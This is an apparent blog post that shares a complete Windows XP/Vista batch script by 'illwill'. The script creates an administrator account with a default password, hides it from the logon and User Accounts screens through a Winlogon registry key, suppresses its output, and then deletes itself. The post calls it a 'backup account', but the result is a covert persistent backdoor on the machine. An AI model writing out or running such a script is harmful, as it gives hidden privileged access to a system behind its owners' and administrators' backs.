Create A Hidden User on XP/VISTA
Nice little .bat script trick from illwill @ that will create user who’s account will be hidden from the logon screen and the User Accounts screen in control panel. This will only work if its ran from an account that has admin rights. It’s great for a backup account.
@echo off rem HideUser.bat rem by illwill rem This will create a hidden user with admin rights in XP/Vista rem ( hidden meaning that the username wont appear in the logon screen) rem change the illwill & passw0rd to your own rem Add once you log into your new account dont forget to hide the user folder rem "attrib +r +a +s +h %USERPROFILE%" SET NEWUSER=adm1n SET PASS=passw0rd net user %NEWUSER% %PASS% /add && net localgroup administrators %NEWUSER% /add>nul 2>&1 reg.exe ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v %NEWUSER% /t REG_DWORD /d 0 /f>nul 2>&1 DEL %0